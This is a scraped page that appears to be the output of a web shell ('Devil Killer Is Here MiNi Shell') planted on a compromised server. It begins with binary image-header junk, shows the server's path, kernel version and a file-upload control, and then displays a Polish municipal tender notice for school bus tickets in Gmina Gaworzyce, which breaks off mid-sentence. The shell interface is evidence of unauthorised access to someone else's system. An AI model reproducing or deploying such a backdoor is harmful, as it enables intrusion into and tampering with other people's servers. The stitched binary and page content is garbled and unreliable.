JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241126/0061687101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Zakup biletów miesięcznych dla uczniów dojeżdżających do placówek oświatowych w Gminie Gaworzyce w okresie od 1 stycznia 2025 r. do 31 grudnia 2026 r.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Gaworzyce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 390647587</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dworcowa 95</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gaworzyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-180</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">768316285</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">k.kubas@gaworzyce.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.gaworzyce.com.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zakup biletów miesięcznych dla uczniów dojeżdżających do placówek oświatowych w Gminie Gaworzyce w okresie od 1 stycznia 2025 r. do 31 grudnia 2026 r.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-89144c26-11ee-45d5-a18b-79d16bc08e83</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00616871</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00067723/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 „Zakup biletów miesięcznych dla uczniów dojeżdżających do placówek oświatowych w Gminie Gaworzyce w okresie od 1 stycznia 2025 r. do 31 grudnia 2026 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/gaworzyce <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu, w tym składanie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą odbywa się przy użyciu środków komunikacji<br/>elektronicznej. Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl<br/>pod adresem<br/>https://platformazakupowa.pl/pn/gaworzyce.Komunikacja między Zamawiającym a Wykonawcami,<br/>w tym przekazywanie wszelkich oświadczeń, wniosków, zawiadomień oraz informacji, odbywać się będzie w formie elektronicznej za<br/>pośrednictwem Platformy i formularza „Wyślij wiadomość”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz<br/>informacji przyjmuje się datę ich przesłania za pośrednictwem Platformy poprzez kliknięcie przycisku „Wyślij wiadomość” po których<br/>pojawi się komunikat, że wiadomość została wysłana do Zamawiającego. W przypadku awarii platformy zakupowej uznaję się datę<br/>ich otrzymania przez Zamawiającego na adres e-mail:k.kubas@gaworzyce.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacje, które nie zmieściły się w<br/>tym polu ze względu na ograniczenia ilości znaków dostępne są w SWZ.1. Wymagania techniczne i organizacyjne dotyczące<br/>korespondencji elektronicznej zostały opisane w rozdziale II SWZ. 2. Zamawiający wymaga podpisania oferty, oświadczeń oraz<br/>dokumentów kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zawarto w rozdziale XIX SWZ i w załączniku nr 6 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.19.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca na zakupie biletów miesięcznych na przewozy* w latach 2025-2026 uczniów i dzieci przedszkolnych z terenu Gminy Gaworzyce i Gminy Niegosławice dojeżdżających do placówek oświatowych w:<br/>- Szkoły Podstawowej im. Kornela Makuszyńskiego w Gaworzycach, ul. Szkolna 211, 59-180 Gaworzyce <br/>- Publicznego Przedszkola w Gaworzycach, ul. Szkolna 211a, 59-180 Gaworzyce<br/><br/>* Przez pojęcie „przewozu” należy rozumieć usługę transportu uczniów i dzieci przedszkolnych z miejscowości wymienionych w pkt 4.2 do placówek oświatowych w Gaworzycach.<br/><br/>4.2. Zamawiający szacuje, że usługą przewozu objęte będzie około 185 uczniów i dzieci przedszkolnych w wieku 5-6 lat uczęszczających do placówek oświatowych gminy Gaworzyce według następującego wykazu: <br/><br/>−	przewóz do Szkoły Podstawowej w Gaworzycach, ul. Szkolna 211, 59-180 Gaworzyce, Przedszkola Publicznego w Gaworzycach, ul. Szkolna 211a, 59-180 Gaworzyce <br/><br/>Miejscowość	Liczba uczniów	Liczba dzieci przedszkolnych w wieku 6 lat (rocznik 2018) Liczba dzieci przedszkolnych w wieku 5 lat <br/>(rocznik 2019) <br/>Dzików	9	1	0<br/>Mieszków	12	0	0<br/>Koźlice 28	3	5<br/>Gostyń	12	2	0<br/>Kłobuczyn	54	6	3<br/>Śrem 3	1	0<br/>Witanowice	2	0	0<br/>Kurów Wielki 3	1	0<br/>Dalków 24	5	0<br/>Nowa Jabłona	18	2	0<br/>Nowy Dwór	2	0	0<br/>Korytów 7	2	1<br/>Grabik 5	0	0<br/>Zimna Brzeźnica	4	1	1<br/>Wierzchowice	2	0	0<br/>RAZEM 185	24	10<br/><br/>4.3. Ze względu na specyfikę usługi, przedmiot zamówienia określony został szacunkowo, mimo określenia go przez Zamawiającego z należytą starannością. Podane liczby uczniów są liczbami aktualnymi na miesiąc listopad 2024 r. i w trakcie realizacji usługi mogą ulec zmianie. Szacunkowa liczba uczniów i dzieci przedszkolny może ulec zmianie o +/- 15 % w terminie roku szkolnego. <br/>4.4. Przewozy będą świadczone na podstawie zakupywanych biletów miesięcznych uprawniających do przejazdu środkami komunikacji publicznej na istniejących lub utworzonych przez Wykonawcę liniach regularnych, zgodnych z trasami określonymi w pkt 4.11. Bilety miesięczne zakupywane w ramach realizacji przedmiotu zamówienia będą uprawniać do pierwszeństwa przejazdu uczniów oraz dzieci przedszkolnych z biletem miesięcznym z miejscowości ich zamieszkania do placówek oświatowych i ich powrotu po skończonych zajęciach do miejscowości ich zamieszkania. Zamawiający zastrzega sobie prawo do zmian w harmonogramie w okresie realizacji przedmiotu zamówienia, ze względu na okoliczności, których Strony nie mogły przewidzieć w chwili zawarcia umowy, a podyktowane potrzebami Zamawiającego (np. zmiana planu zajęć w placówkach oświatowych). Zmiany obejmować mogą godziny kursów, ilości kursów oraz kolejność miejscowości. Zamawiający dopuszcza także uzasadnione zmiany harmonogramu na wniosek Wykonawcy. Zmiany harmonogramów Strony będą przekazywać do akceptacji na wskazane w Umowie do kontaktów adresy email w terminie nie krótszym niż 3 dni kalendarzowych od dnia od którego ma obowiązywać nowy / zmieniony harmonogram. <br/>4.4a W ramach linii komunikacyjnych i kursów według rozkładów jazdy utworzonych wg. Niniejszej specyfikacji, poza niniejszym zleceniem, wykonawca może świadczyć odpłatne usługi transportowe na rzecz innych osób w ramach opłat biletowych, z zastrzeżeniem, iż musi przede wszystkim zapewnić transport uczniom i opiekunom w ramach zawartej umowy. Uczniowie bezwzględnie muszą mieć zapewnione miejsca siedzące.<br/>4.5. Szczegółowa, imienna liczba uczniów dla których zostaną zakupione bilety miesięczne (w rozbiciu na poszczególne miejscowości) będzie przekazywana przez Zamawiającego do Wykonawcy na wskazany w Umowie do kontaktów adres email w terminie do 27 dnia miesiąca poprzedzającego miesiąc świadczenia usługi przewozu. Zamawiający zastrzega sobie prawo do zmiany ilości zakupywanych w danym miesiącu biletów miesięcznych, w związku ze zmianą liczby przewożonych uczniów na zasadach określonych w pkt. 4.3 W przypadku zwiększenia liczby uczniów oraz dzieci przedszkolnych objętych usługą przewozu Wykonawca musi zapewnić ich dowóz na warunkach określonych w niniejszym postępowaniu. Wykonawca musi być przygotowany w razie potrzeby na zwiększenie liczby uczniów i dzieci przedszkolnych objętych usługą przewozu na zasadach określonych w pkt. 4.3 poprzez zapewnienie autobusu o większej liczbie miejsc lub zwiększeniu liczby kursów ale przy zachowaniu zasady jeden autobus na jedną trasę. Bilet miesięczny dla ucznia oraz dziecka przedszkolnego upoważnia do przejazdu z miejscowości zamieszkania do placówki oświatowej i z powrotem po zakończonych zajęciach.<br/>4.6. Pojazdy, którymi będzie świadczona usługa muszą odpowiadać ogólnym warunkom przewozu osób, spełniać wymogi bezpieczeństwa i warunki techniczne określone odrębnymi przepisami, posiadać ważne polisy ubezpieczeniowe OC i NNW, aktualne badania techniczne, posiadać odpowiednie oznakowanie dla przewozu uczniów i dzieci przedszkolnych oraz dysponować odpowiednią ilością miejsc do liczby przewożonych na danej trasie pasażerów. Wykonawca musi zapewnić przewożonym pasażerom bezpieczny przewóz, tzn. odpowiednie warunki bezpieczeństwa i higieny. <br/>4.7. W przypadku awarii autobusu przewożącego uczniów Wykonawca zobowiązany jest podstawić sprawny autobus zastępczy i dokończyć przewóz uczniów na danej trasie, przy czym autobus zastępczy musi spełniać wszystkie wymagania o których mowa w pkt 4.6.<br/>4.8. Wykonawca musi dysponować ilością autobusów odpowiednią do realizacji zamówienia, nie mniejszą niż 2 autobusy o ilości miejsc siedzących zapewniających właściwą realizację zamówienia, tj. jeden autobus na jedną trasę.<br/>4.9. Opiekę nad uczniami i dziećmi przedszkolnymi w autobusach podczas realizowania usługi przewozu zapewnia Zamawiający. Opiekunowie wyznaczeni przez Zamawiającego mają prawo do bezpłatnych przejazdów w czasie wykonywania opieki. Wykonawca zapewnia bezpłatne miejsce dla opiekuna zatrudnionego przez Zamawiającego w każdym autobusie. Przed rozpoczęciem usługi Zamawiający poinformuje Wykonawcę na wskazany w Umowie do kontaktów adres email o osobach, które zostały wyznaczone na opiekunów.<br/>4.9a Wykonawca przed podpisaniem umowy w ciągu 5 dni od daty przesłania mu informacji o wyborze oferty zobowiązany jest do zamontowania w każdym z autobusów, którymi będzie wykonywał niniejszą usługę, monitoringu wizyjnego, który każdorazowo będzie nagrywał obraz wewnątrz pojazdu podczas codziennego przewozu uczniów. Monitoring musi obejmować cały autobus. Nagrany materiał powinien być przechowywany przez okres 30 dni od dnia nagrania i w razie zaistniałej potrzeby niezwłocznie udostępniany Zamawiającemu w formacie ogólnodostępnym.<br/>4.9b Wykonawca zobowiązany jest wyposażyć autobusy, którymi będzie świadczyć usługi przewozu osób, stanowiące przedmiot zamówienia, w kasy rejestrujące (tzw. „bileterki”) posiadające pozytywną opinię ministra właściwego ds. finansów publicznych. Kasy te muszą umożliwiać określenie kwoty dopłaty do przewozów, z podziałem na poszczególne kategorie ulg ustawowych oraz umożliwiać sprzedaż biletów jednorazowych z zastosowaniem ulg ustawowych.<br/>4.10. W ramach otwartego przewozu, Zamawiający może przewozić także dzieci przedszkolne poniżej 5 roku życia - na koszt rodziców. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60112000-6 - Usługi w zakresie publicznego transportu drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia autobusu zastępczego w razie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące:<br/>1)	posiadania zdolności do występowania w obrocie gospodarczym Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2)	posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający wymaga posiadanie zezwolenia lub licencji na wykonywanie transportu drogowego, zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (Dz.U. z 2024 , poz. 1539);<br/>3)	sytuacji ekonomicznej lub finansowej:<br/> Zamawiający wymaga posiadanie aktualnego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę, na kwotę co najmniej 300.000,00 zł;<br/><br/>4)	zdolności technicznej lub zawodowej;<br/>Wykonawca spełnia warunek, jeżeli wykaże, że: dysponuje co<br/>najmniej dwoma autobusami, które łącznie posiadają minimum 130<br/>miejsc siedzących, spełniające wymagania techniczne określone<br/>przepisami ustawy Prawo o Ruchu Drogowym oraz innymi przepisami<br/>szczegółowymi. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia przez<br/>wykonawcę braku podstaw wykluczenia z postępowania, Zamawiający żąda złożenia:<br/>1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym<br/>wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji,<br/>3) oświadczenia własnego wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy,<br/>w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 3 ustawy,<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 ustawy,<br/>e) art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego ( Dz. U. z 2023 r. poz. 129 ).<br/>Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy, przedstawienia podmiotowych<br/>środków dowodowych, o których mowa w ppkt. 2 – 3) dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych<br/>podmiotów podstawy wykluczenia z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">aktualną<br/>licencję na wykonywanie krajowego drogowego przewozu osób lub zezwolenie na wykonywanie zawodu przewoźnika<br/>drogowego w zakresie przewozu osób, zgodnie z ustawą z dnia 6 września 2001r. o transporcie drogowym ( z 2023 r. poz. 760, 919,<br/>1123, 1193, 1195,1523, 1720)<br/>- wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia<br/>publicznego wraz z informacją o podstawie dysponowania tymi zasobami – wzór wykazu stanowi załącznik nr 8 do SWZ,</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>wykonawcy jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów w przypadku wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, dokumenty składa każdy z wykonawców, -w przypadku, gdy<br/>wykonawca w celu wykazania spełniania warunków udziału w postępowaniu polega na zdolnościach technicznych lub<br/>zawodowych podmiotów udostępniających zasoby,<br/>należy złożyć ponadto dokumenty dotyczące tego podmiotu, jeżeli w imieniu tego podmiotu<br/>działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów,2) W<br/>przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, wraz z ofertą<br/>wykonawcy zobowiązani są złożyć pełnomocnictwo do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego.<br/>3)W przypadku gdy wykonawca, w celu potwierdzenia spełniania warunków udziału w<br/>postępowaniu, polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby<br/>wykonawca składa wraz z ofertą zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca<br/>realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów . Zobowiązanie podmiotu<br/>udostępniającego<br/>zasoby, ma potwierdzać, że stosunek łączący wykonawcę z podmiotami udostępniającymi<br/>zasoby gwarantuje rzeczywisty dostęp do tych zasobów i określa w szczególności:<br/>1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>2) sposób i okres udostępniania wykonawcy i wykorzystania przez 